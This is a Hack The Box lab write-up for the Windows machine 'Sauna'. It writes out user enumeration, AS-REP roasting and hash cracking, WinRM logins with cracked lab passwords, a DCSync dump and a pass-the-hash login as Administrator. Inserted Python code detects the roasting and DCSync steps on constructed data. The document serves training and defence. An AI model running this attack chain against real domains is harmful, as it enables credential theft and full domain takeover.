Sauna
February 03, 2025

Created by: egotisticalSW
Platform: Hack The Box
Difficulty: Easy
OS: Windows

The first step is to scan for open ports and then enumerate the versions and technologies running on them.

```bash
nmap -p- --open --min-rate 3000 -vvv -sS -Pn 10.10.10.175 -oG scan
/opt/extractports scan
nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49695 -Pn -sCV 10.10.10.175 -oN ports
```

I found the domain EGOTISTICAL-BANK.LOCAL and added it to the hosts file.

Since port 53 is open, I query the DNS server for additional records and find a subdomain.

```bash
dig @10.10.10.175 EGOTISTICAL-BANK.LOCAL any
```

Browsing the different pages of the website, I find one listing the first and last names of potential users.

Using those names, I generate a list of candidate usernames and validate them with kerbrute to find which ones exist in the domain.

```bash
./username-anarchy -i ../users > usuarios
/opt/kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL /home/rufo/usuarios
```

With the user that exists, I check whether an ASREPRoast attack is possible. I obtain his AS-REP hash (saved as TGT_fsmith) and crack it to recover the password in clear text.

```bash
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile users
hashcat -m 18200 TGT_fsmith /usr/share/wordlists/rockyou.txt
```

I verify the credentials and gain access to the system through WinRM to read the first flag.

```bash
netexec winrm 10.10.10.175 -u fsmith -p Thestrokes23
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
```

At this point I run winPEAS to get a broader view of the system I am dealing with. In its output I notice some autologon credentials. I check whether the password found belongs to a domain user and confirm that it belongs to svc_loanmgr.

```bash
netexec smb 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
```

Next I collect information from the domain to load into BloodHound and look for possible paths to escalate my privileges.
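From the defender's side, the ASREPRoast step above leaves two things to look for: accounts whose userAccountControl has the "do not require Kerberos preauthentication" bit set (the precondition GetNPUsers relies on), and Event ID 4768 TGT requests issued with no pre-authentication and RC4 encryption (the artefact the request leaves on the domain controller). The following Python is an added example, not part of the original writeup; it runs over constructed account attributes and constructed event records, so the usernames, IPs and field values are assumptions rather than telemetry from the box.

```python
"""Defender-side checks for the AS-REP roasting step.

Added example, not from the original writeup. Works on constructed
userAccountControl values and constructed Event ID 4768 records shaped
like the Windows Security log fields; nothing here contacts a DC.
"""

# userAccountControl bit that disables Kerberos pre-authentication.
# Accounts with this bit set are the ones an AS-REP roasting tool can target.
DONT_REQ_PREAUTH = 0x400000

# 4768 fields used: PreAuthType (0 = no pre-auth) and TicketEncryptionType
# (0x17 = RC4-HMAC, the cipher that hashcat mode 18200 cracks).
RC4_HMAC = 0x17


def accounts_without_preauth(accounts):
    """Return sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set."""
    return sorted(name for name, uac in accounts.items() if uac & DONT_REQ_PREAUTH)


def asrep_roast_candidates(events):
    """Flag 4768 events consistent with AS-REP roasting.

    A successfully issued TGT with PreAuthType 0 and RC4 encryption is the
    signature a roasting request leaves behind. Returns (account, client_ip).
    """
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768:
            continue
        if ev.get("Status") != "0x0":  # failed requests did not yield a hash
            continue
        if ev.get("PreAuthType") != 0:
            continue
        if ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits


def ips_roasting_many_accounts(events, threshold=2):
    """Client IPs that obtained roastable tickets for at least `threshold`
    distinct accounts, the pattern of running a user list through the check."""
    per_ip = {}
    for account, ip in asrep_roast_candidates(events):
        per_ip.setdefault(ip, set()).add(account)
    return sorted(ip for ip, accts in per_ip.items() if len(accts) >= threshold)


# Constructed sample data (assumed values, not collected from the box).
SAMPLE_ACCOUNTS = {
    "fsmith": 0x200 | 0x400000,      # NORMAL_ACCOUNT + DONT_REQ_PREAUTH
    "hsmith": 0x200,                 # NORMAL_ACCOUNT only
    "svc_loanmgr": 0x200 | 0x10000,  # NORMAL_ACCOUNT + DONT_EXPIRE_PASSWORD
}

SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "fsmith", "IpAddress": "10.10.14.5",
     "Status": "0x0", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"EventID": 4768, "TargetUserName": "nobody", "IpAddress": "10.10.14.5",
     "Status": "0x6", "PreAuthType": 0, "TicketEncryptionType": 0x17},  # unknown user
    {"EventID": 4768, "TargetUserName": "svc_loanmgr", "IpAddress": "10.10.10.175",
     "Status": "0x0", "PreAuthType": 2, "TicketEncryptionType": 0x12},  # normal AES logon
    {"EventID": 4768, "TargetUserName": "jdoe", "IpAddress": "10.10.14.5",
     "Status": "0x0", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"EventID": 4624, "TargetUserName": "fsmith", "IpAddress": "10.10.14.5"},
]

if __name__ == "__main__":
    print("accounts without pre-auth:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("roast artefacts:", asrep_roast_candidates(SAMPLE_EVENTS))
    print("clients roasting several accounts:", ips_roasting_many_accounts(SAMPLE_EVENTS))
```

The account check is the mitigation: clearing the DONT_REQ_PREAUTH bit on every account that does not genuinely need it removes the precondition, and the event check catches the request pattern if someone tries it anyway.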
```bash
neo4j console
bloodhound &>/dev/null &
netexec ldap 10.10.10.175 -u fsmith -p Thestrokes23 --bloodhound --collection All --dns-server 10.10.10.175
```

BloodHound shows that svc_loanmgr has enough permissions on the domain to perform a DCSync attack and obtain the NTLM hash of the Administrator user. With that hash I can pass-the-hash, access the system and read the second flag.

```bash
netexec smb 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround! --ntds --user Administrator
evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
```
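The DCSync finding comes down to two extended rights on the domain object, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, being granted to a principal that is not a domain controller or a built-in administrative group. That makes it both auditable in advance (walk the ACL the way BloodHound does) and detectable afterwards (Event ID 4662 records a non-DC account exercising those rights). The Python below is an added example, not code from the writeup: the ACEs, the event records and the DC computer account name `DC01$` are constructed assumptions.

```python
"""Defender-side checks for the DCSync step.

Added example, not from the original writeup. Works on a constructed list of
ACEs from the domain head and constructed Event ID 4662 records; no directory
or event log is queried.
"""

# Extended-right GUIDs that together allow directory replication (DCSync).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Principals expected to hold replication rights; anyone else is a finding.
EXPECTED_REPLICATORS = {
    "DOMAIN CONTROLLERS", "ENTERPRISE DOMAIN CONTROLLERS",
    "ADMINISTRATORS", "DOMAIN ADMINS", "ENTERPRISE ADMINS",
}


def unexpected_dcsync_principals(aces):
    """Principals granted both replication rights on the domain object that are
    not in EXPECTED_REPLICATORS.

    `aces` is a list of dicts with keys 'trustee', 'type' ('Allow' or 'Deny')
    and 'right' (an extended-right GUID). Deny ACEs are skipped because they
    never grant anything; a principal with only one of the two rights is not
    reported, since DCSync needs both.
    """
    granted = {}
    for ace in aces:
        if ace["type"] != "Allow" or ace["right"].lower() not in REPLICATION_RIGHTS:
            continue
        granted.setdefault(ace["trustee"].upper(), set()).add(ace["right"].lower())
    return sorted(
        trustee for trustee, rights in granted.items()
        if rights == REPLICATION_RIGHTS and trustee not in EXPECTED_REPLICATORS
    )


def dcsync_events(events, dc_accounts):
    """4662 events in which a principal other than a DC computer account used a
    replication extended right. Returns (subject, object_name) pairs."""
    dcs = {d.upper() for d in dc_accounts}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if ev.get("AccessMask") != "0x100":  # 0x100 = control access (extended right)
            continue
        props = ev.get("Properties", "").lower()
        if not any(guid in props for guid in REPLICATION_RIGHTS):
            continue
        if ev["SubjectUserName"].upper() in dcs:
            continue  # normal DC-to-DC replication
        hits.append((ev["SubjectUserName"], ev["ObjectName"]))
    return hits


# Constructed sample data (assumed values, not collected from the box).
SAMPLE_ACES = [
    {"trustee": "Domain Admins", "type": "Allow", "right": DS_REPLICATION_GET_CHANGES},
    {"trustee": "Domain Admins", "type": "Allow", "right": DS_REPLICATION_GET_CHANGES_ALL},
    {"trustee": "Domain Controllers", "type": "Allow", "right": DS_REPLICATION_GET_CHANGES},
    {"trustee": "Domain Controllers", "type": "Allow", "right": DS_REPLICATION_GET_CHANGES_ALL},
    {"trustee": "svc_loanmgr", "type": "Allow", "right": DS_REPLICATION_GET_CHANGES},
    {"trustee": "svc_loanmgr", "type": "Allow", "right": DS_REPLICATION_GET_CHANGES_ALL},
    {"trustee": "fsmith", "type": "Allow", "right": DS_REPLICATION_GET_CHANGES},  # one right only
    {"trustee": "hsmith", "type": "Deny", "right": DS_REPLICATION_GET_CHANGES_ALL},
]

DOMAIN_DN = "DC=EGOTISTICAL-BANK,DC=LOCAL"
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "ObjectName": DOMAIN_DN,
     "AccessMask": "0x100", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "ObjectName": DOMAIN_DN,
     "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "fsmith", "ObjectName": "CN=fsmith,CN=Users," + DOMAIN_DN,
     "AccessMask": "0x10", "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # unrelated write
]

if __name__ == "__main__":
    print("unexpected replicators:", unexpected_dcsync_principals(SAMPLE_ACES))
    print("DCSync events:", dcsync_events(SAMPLE_EVENTS, ["DC01$"]))
```

The ACL walk is the preventive control, reviewed whenever a service account is granted rights on the domain head; the 4662 filter is the detective one and needs the "Directory Service Access" audit subcategory enabled on the domain controllers to produce the events.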